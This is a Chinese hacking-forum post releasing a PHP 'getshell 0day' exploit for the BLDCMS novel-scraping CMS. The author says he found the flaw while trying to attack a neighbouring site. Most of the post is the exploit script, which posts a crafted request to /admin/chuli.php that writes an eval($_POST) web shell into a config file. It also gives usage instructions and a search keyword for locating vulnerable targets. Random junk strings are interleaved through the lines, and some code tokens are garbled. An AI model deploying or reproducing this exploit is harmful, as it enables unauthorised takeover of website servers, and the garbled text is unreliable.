之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞
$ w! V! h8 t3 c- b
* T7 u( Y; R5 q3 A ' ?9 V( A7 K2 ^& z) S
话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了 $ u3 F$ W+ \: w8 f
6 r# [: M0 |& I( z: A: F/ `) A既然都有人发了 我就把我之前写好的EXP放出来吧
0 n( ~( P) s9 {% ?
- M4 O' [1 I7 Y& bview source print?01.php;">) Z* k2 A; a- m
02.<!--?php
2 `4 i" v: A$ ~! p. N03.echo "-------------------------------------------------------------------
- v+ R7 u& G5 K8 n) p04.
/ b5 c" p% k0 s: b5 V4 u/ A05.------------\r\n BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP
/ ?- o( F, Z, f06.
# B$ s( e W1 B; n: O8 E07.(GPC=Off)\r\n Vulnerability discovery&Code by 数据流@wooyun1 S8 e2 f9 G; F, z# `8 i% g! k5 R
08.
: o& A" N0 h% l8 C09.QQ:981009941\r\n 2013.3.21\r\n , A& @2 i# O% l2 b
10.
x! X! ?, w9 V6 M- Y3 C11. ( l) ^+ @& o- d0 d% r
12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码/ R. O( R2 z5 l; u; D' i& v
13. # D8 k Y/ t9 `: P) j8 o1 O( I5 t6 s
14.)\r\n 搜索关键字:\"开发者: 白老大小说\"\r\n-----------
% q( n# c# l' X15. 5 E' D2 L: i( I' F
16.--------------------------------------------------------------------\r\n";; m0 }4 K U, W
17.$url=$argv[1];0 u$ C- {( C' a5 Q
18.$dir=$argv[2];7 D1 s/ I' K" G. ] v* y; Q/ g6 \
19.$pass=$argv[3];
4 g; ^! |0 O6 [& U20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';
. z( h0 c5 G) m, G& G8 Q21.if (emptyempty($pass)||emptyempty($url))
/ d- {$ \: A2 @, y( ?) \$ f22.{exit("请输入参数");}8 v& C; T6 C! ]+ y* A5 X
23.else
2 i7 I5 X( l$ q1 s7 g9 w5 e* t. l24.{
l+ B6 [, r$ d' W s% t0 \* F25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev
* J6 F. V' z& `+ O4 ^4 Y26.
$ N2 N3 `6 I9 {! z5 k27.al;
. `% a9 P' g0 j; Q6 t; b/ g8 I3 D; z28.$length = strlen($fuckdata);' k% g l1 B/ |- t- y1 V, g+ s1 ?
29.function getshell($url,$pass)$ T& I0 C" w* R& g" W5 V
30.{1 U6 G6 D8 T9 ~8 [
31.global $url,$dir,$pass,$eval,$length,$fuckdata;$ A. |, D1 D# K- K
32.$header = " OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";
4 a, q1 I$ p" o4 ]: |$ X2 _5 [5 i33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";# W# u9 L. m% U- {% @0 Y# y
34.$header .= "User-Agent: MSIE\r\n";
# A9 B5 W6 G9 K+ R, m" t8 [, T35.$header .= "Host:".$url."\r\n";
% M8 B T/ v$ H6 q; }4 C36.$header .= "Content-Length: ".$length."\r\n";5 }( k$ i( m0 x; Q- B
37.$header .= "Connection: Close\r\n";
% ~/ w: Y" h9 y+ Y38.$header .="\r\n";# o2 b. C/ B5 Q
39.$header .= $fuckdata."\r\n\r\n";
6 z5 N* n. w W0 Q3 J( c40.$fp = fsockopen($url, 80,$errno,$errstr,15);+ U2 ]5 l: A; t7 @. [
41.if (!$fp)
4 i' z4 I2 L! N, B4 W2 j42.{6 Y2 a2 Z$ ]/ b6 b2 q4 x3 J
43.exit ("利用失败:请检查指定目标是否能正常打开");$ k3 \. I; R6 u$ m! E( C0 e& N
44.}
1 E3 M0 |8 U5 J; j4 b+ K45.else{ if (!fputs($fp,$header))
6 x: T% w# `6 i$ _/ e; X+ I! N46.{exit ("利用失败");}
) C3 v# L7 j* B4 ^47.else
0 ^9 A5 }% `5 i; P8 u48.{) x+ d9 i, x7 s/ |6 t
49.$receive = '';
. t j" Z# O1 I8 F& V2 u50.while (!feof($fp)) {/ Y- R3 }. }. F7 r/ Z( m; v+ I
51.$receive .= @fgets($fp, 1000);
5 J) O6 T: R) i9 R, A+ B52.}
2 e2 [0 Z2 R& t+ P* r- {53.@fclose($fp);
) m. I6 J( ]6 J" G* T0 p54.echo "$url/$dir/conn/config/normal2.php pass pass(如连接失败 请检查目标
0 x. Z. v( D2 f- _9 d. ^1 f55. 8 N9 c. |3 N% m8 F9 ?8 `
56.GPC是否=off)";
3 O8 r6 z7 E( L0 M) ]; q57.}}# j/ I! W: L3 B N* [9 o
58.}
3 A. O0 f T5 d7 T59.}7 J8 }' x9 [( _
60.getshell($url,$pass);
- @2 G( h7 ?6 y, Y61.?-->
% O& N0 I- X3 `1 O1 s6 O6 m2 F1 u
3 }3 Q, m, _% @# \& P
h% M) L( C1 f& o+ y. ]* M9 S " C. |6 M& o3 r* V& X2 |" }* o
by 数据流
( a3 D: \2 G L$ A3 q" o |